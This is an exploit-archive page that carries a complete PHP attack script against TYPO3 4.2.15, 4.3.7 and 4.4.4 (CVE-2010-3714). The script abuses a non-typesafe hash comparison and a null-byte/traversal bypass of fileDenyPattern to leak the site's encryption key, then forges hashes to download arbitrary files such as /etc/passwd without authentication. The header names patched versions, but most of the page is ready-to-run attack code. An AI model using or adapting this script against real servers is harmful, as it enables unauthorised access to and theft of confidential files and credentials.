exploit the possibilities

TYPO3 Unauthenticated Arbitrary File Retrieval

TYPO3 Unauthenticated Arbitrary File Retrieval
Posted Dec 29, 2010
Authored by ikki

TYPO3 unauthenticated arbitrary file retrieval exploit. Affects versions 4.2.15, 4.3.7, and 4.4.4.

tags | exploit, arbitrary, file inclusion
advisories | CVE-2010-3714
SHA-256 | 2a2b3e4555ad13f58b384edbe8d46660c60151646bfc4b76dba4acdbbd9df710

TYPO3 Unauthenticated Arbitrary File Retrieval

Change Mirror Download
<?php
/* TYPO3-SA-2010-022.php
* Exploit Title: TYPO3 Unauthenticated Arbitrary File Retrieval (TYPO3-SA-2010-020, TYPO3-SA-2010-022)
* Date: 29/12/2010
* Author: ikki
* Software Link: http://typo3.org/download/, http://sourceforge.net/projects/typo3/files/
* Version: 4.2.15, 4.3.7 or 4.4.4
* Tested on: php
* CVE : CVE-2010-3714 (non-typesafe comparison flaw), n/a (fileDenyPattern bypass)
* A demonstration video for this vulnerability is also available here: http://www.ikkisoft.com/stuff/TYPO3-SA-2010-020_video.htm
*
* @_ikki
*
* TYPO3 Unauthenticated Arbitrary File Retrieval (TYPO3-SA-2010-020, plus TYPO3-SA-2010-022)
*
* Exploiting a non-typesafe comparison flaw, a remote aggressor can access arbitrary files
* on a vulnerable system. Authentication is not required to exploit this vulnerability.
* Moreover, a "fileDenyPattern" bypass has been implemented in order to speed up the attack.
*
* References:
* - http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020/
* - http://bugs.typo3.org/view.php?id=15898
* - http://php.net/manual/en/language.operators.comparison.php
* - http://blog.nibblesec.org/2010/12/unspecified-vulnerabilities.html ("least disclosure" rant)
*
* Fix: Update to the TYPO3 versions 4.2.16, 4.3.9, 4.4.5 or newer
* Credits: Gregor Kopf for finding the neat non-typesafe comparison flaw, MichaƂ Trojnara for his daily tips
*/

define("VERSION","0.2");
/* v0.2
* - HTTP and HTTPS support (without verifying the peer's certificate)
* - File retrieval, just after the initial encryption key disclosure
* - Proxy support
* - (Dirty) multi requests support (using curl multi_requests)
* - Preliminary checks
*/
define("DEBUG",FALSE);
if(!defined("STDIN")) define("STDIN", fopen('php://stdin','r'));
if(!defined("STDERR")) define("STDERR", fopen('php://stderr','r'));

/* Turn on/off all error reporting */
DEBUG ? error_reporting(E_ALL) : error_reporting(0);
set_time_limit(0);

/* Main */
echo("\n\n :: [ TYPO3-SA-2010-022.php v".VERSION." ] :: \n\n");

if($argc=="3"){
$typo=$argv[1];
$reqs=$argv[2]; //Uwaga! Too many requests may even slow down the attack
}else if($argc=="4"){
$typo=$argv[1];
$reqs=$argv[2]; //Uwaga! Too many requests may even slow down the attack
$proxy=$argv[3];
}else{
echo "Usage: php ".$argv[0]." TYPO3ValidURL ParallelRequests (Proxy)\n\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." http://127.0.0.1/index.php?id=2 9\n";
echo "php ".$argv[0]." https://127.0.0.1/index.php?id=15 9\n";
echo "php ".$argv[0]." http://127.0.0.1:8080/index.php?id=223 12\n";
echo "php ".$argv[0]." http://127.0.0.1/index.php?id=223 12 http://127.0.0.1:8181\n\n";
exit;
}

$url=substr($typo,0,strpos($typo,"id=")-1);
$id=substr($typo,strpos($typo,"id=")+3);
$locationData=$id.":";
$jumpurl="typo3conf/ext/../localconf.php%00"; //Null byte and directory move up trick the fileDenyPattern mechanism
$juHash="0"; // "0" is a numeric string, converted internally to 0 (int) by PHP during comparisons

/* STEP 1 - Check the remote TYPO3 installation */
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
DEBUG ? curl_setopt($ch, CURLOPT_VERBOSE, TRUE):curl_setopt($ch, CURLOPT_VERBOSE, FALSE);
curl_setopt($ch, CURLOPT_POST, 1);
if(isset($proxy)){
curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
curl_setopt($ch, CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$locationData."&juHash=".$juHash);
$output=curl_exec($ch);

if(stristr($output,"did not match")) {
echo("[*] TYPO3 successfully detected!\n");
}else{
echo("[!] A problem occurred while detecting the remote TYPO3 installation\n");
exit;
}
curl_close ($ch);

/* STEP 2 - Retrieve $TYPO3_CONF_VARS['SYS']['encryptionKey'] from /typo3conf/localconf.php */
$mh = curl_multi_init();
$handles = array();
$location = $locationData; //locationData with padding

for($i=0;$i<$reqs;$i++){
$ch = curl_init(); //create a new single curl handle
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch, CURLOPT_POST, 1);
if(isset($proxy)){
curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
$location = "%20".$location;
curl_setopt($ch, CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$location."&juHash=".$juHash);

curl_multi_add_handle($mh,$ch);
$handles[] = $ch; // put the handles in an array to loop
}

echo("[*] Starting TYPO3's encryption key retrieval\n");
echo("[*] Padding locationData to force '0exxxxxx' strings. It may take a while.");

$rcont=0;
while(!stristr($output,"TYPO3_CONF_VARS['SYS']['encryptionKey']")){
$running=null;
do{
curl_multi_exec($mh,$running);
} while ($running > 0);

for($i=0;$i<count($handles);$i++){
$output = curl_multi_getcontent($handles[$i]);
$location="%20".$location;
curl_multi_remove_handle($mh,$handles[$i]);
curl_setopt($handles[$i], CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$location."&juHash=".$juHash);
curl_multi_add_handle($mh,$handles[$i]);
$rcont++;
echo(".");
}
}

curl_multi_remove_handle($mh,$handles[$i]);
curl_multi_close($mh);

$key=substr($output,strpos($output,"TYPO3_CONF_VARS['SYS']['encryptionKey'] = '")+43);
$key=substr($key,0,strpos($key,"';"));
echo("\n[*] Done! ".$rcont." requests\n");
echo("\n[*] TYPO3's encryption key:".$key."\n");

/* STEP 3 - Retrieve arbitrary files */
while(!0) {
echo("\n[*] Which file do you want to download?\n");
echo("[*] Please make your selection (e.g. '/etc/passwd'):\n\n");
$jumpurl=trim(fgets(STDIN,256));
/* Generate a valid hash as in the TYPO3 codebase*/
$hArr= array($jumpurl,$locationData,$key);
$juHash=substr(md5(serialize($hArr)),0,10);;

$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
DEBUG ? curl_setopt($ch, CURLOPT_VERBOSE, TRUE):curl_setopt($ch, CURLOPT_VERBOSE, FALSE);
curl_setopt($ch, CURLOPT_POST, 1);
if(isset($proxy)){
curl_setopt($ch, CURLOPT_PROXY, $proxy);
}
curl_setopt($ch, CURLOPT_POSTFIELDS,"id=".$id."&type=0&jumpurl=".$jumpurl."&juSecure=1&locationData=".$locationData."&juHash=".$juHash);
$output=curl_exec($ch);

echo("\n[*]------------------------------------------------------------------------------\n\n");
if(!stristr($output,"not a valid")) echo $output;
else echo("[!] An error occurred while retriving '".$jumpurl."'\n");
echo("\n\n[*]------------------------------------------------------------------------------\n");

curl_close ($ch);
}

Login or Register to add favorites

File Archive:

May 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    0 Files
  • 2
    May 2nd
    15 Files
  • 3
    May 3rd
    19 Files
  • 4
    May 4th
    24 Files
  • 5
    May 5th
    15 Files
  • 6
    May 6th
    14 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    13 Files
  • 10
    May 10th
    7 Files
  • 11
    May 11th
    99 Files
  • 12
    May 12th
    45 Files
  • 13
    May 13th
    7 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    16 Files
  • 17
    May 17th
    26 Files
  • 18
    May 18th
    4 Files
  • 19
    May 19th
    17 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close